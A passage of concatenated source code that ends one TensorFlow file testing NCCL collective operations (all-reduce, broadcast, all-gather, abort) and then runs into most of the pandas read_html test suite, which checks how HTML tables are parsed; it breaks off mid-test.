collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div'))
return collectives
for result in run_fp16_reduce():
self.assertAllClose(result, expected, rtol=1e-3, atol=1e-3)
def testNcclHintAllReduce(self):
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_hint_all_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div',
communication_hint='nccl'))
return collectives
for result in run_nccl_hint_all_reduce():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testBasicNcclBroadcast(self):
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_nccl_broadcast():
collectives = []
with ops.device(self._devices[0]):
t = constant_op.constant(tensor_value)
collectives.append(collective_ops.broadcast_send(
t, t.shape, t.dtype, self._group_size, group_key, instance_key))
with ops.device(self._devices[1]):
t = constant_op.constant(tensor_value)
collectives.append(collective_ops.broadcast_recv(
t.shape, t.dtype, self._group_size, group_key, instance_key))
return collectives
for result in run_basic_nccl_broadcast():
self.assertAllClose(result, tensor_value, rtol=1e-5, atol=1e-5)
def testNcclBroadcastDoubleRecv(self):
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_broadcast_double_recv():
for device in self._devices:
with ops.device(device):
t = constant_op.constant(tensor_value)
collective_ops.broadcast_recv(
t.shape, t.dtype, self._group_size, group_key, instance_key)
with self.assertRaisesRegex(errors.InternalError, 'found no source'):
run_nccl_broadcast_double_recv()
def testNcclBroadcastDoubleSend(self):
self._setup_context()
tensor_value = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1]
group_key = 1
instance_key = 1
@def_function.function
def run_nccl_broadcast_double_send():
for device in self._devices:
with ops.device(device):
t = constant_op.constant(tensor_value)
collective_ops.broadcast_send(
t, t.shape, t.dtype, self._group_size, group_key, instance_key)
with self.assertRaisesRegex(errors.InternalError, 'already has source'):
run_nccl_broadcast_double_send()
def testBasicNcclAllGather(self):
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1,
0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_nccl_all_gather():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_gather(t, self._group_size,
group_key, instance_key))
return collectives
for result in run_basic_nccl_all_gather():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testCollectiveDeviceMismatch(self):
self._setup_context()
group_key = 10
instance_key = 20
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
@def_function.function
def run_collective_device_mismatch():
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
collective_ops.all_reduce(in0, self._group_size, group_key,
instance_key, 'Add', 'Id')
with ops.device('/GPU:0'):
in1 = constant_op.constant(t1)
collective_ops.all_reduce(in1, self._group_size, group_key,
instance_key, 'Add', 'Id')
with self.assertRaisesRegex(errors.InternalError,
'but that group has type'):
run_collective_device_mismatch()
def testCollectiveReduceMinMax(self):
self._setup_context()
@def_function.function
def run_all_reduce(group_key, instance_key, merge_op):
t0 = [1., 20., 3., 40., 5.]
t1 = [10., 2., 30., 4., 50.]
with ops.device('/GPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_reduce(
in0, self._group_size, group_key, instance_key, merge_op,
final_op='Id', communication_hint='nccl')
with ops.device('/GPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_reduce(
in1, self._group_size, group_key, instance_key, merge_op,
final_op='Id', communication_hint='nccl')
return c0, c1
for combination in [('Max', [10., 20., 30., 40., 50.]),
('Min', [1., 2., 3., 4., 5.])]:
merge_op = combination[0]
results = run_all_reduce(group_key=10, instance_key=20, merge_op=merge_op)
expected = combination[1]
for result in results:
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testNcclStress(self):
self._setup_context(num_gpus=1)
num_iters = 1000
for _ in range(num_iters):
with ops.device('/device:GPU:0'):
collective_ops.all_reduce(
[1.], group_size=1, group_key=0, instance_key=0, merge_op='Add',
final_op='Id', communication_hint='NCCL')
@test_util.run_v2_only
def testAbortNccl(self):
self._setup_context(num_gpus=2)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
# First perform a normal collective to finish resolution.
def collective_fn():
for device in ['GPU:0', 'GPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
t.join()
# Reset the context in order to reset the collective executor.
context._reset_context() # pylint: disable=protected-access
def_function.function(collective_fn)()
if __name__ == '__main__':
test.main()
|
test_html.py | from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
),
check_before_test=True,
)
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
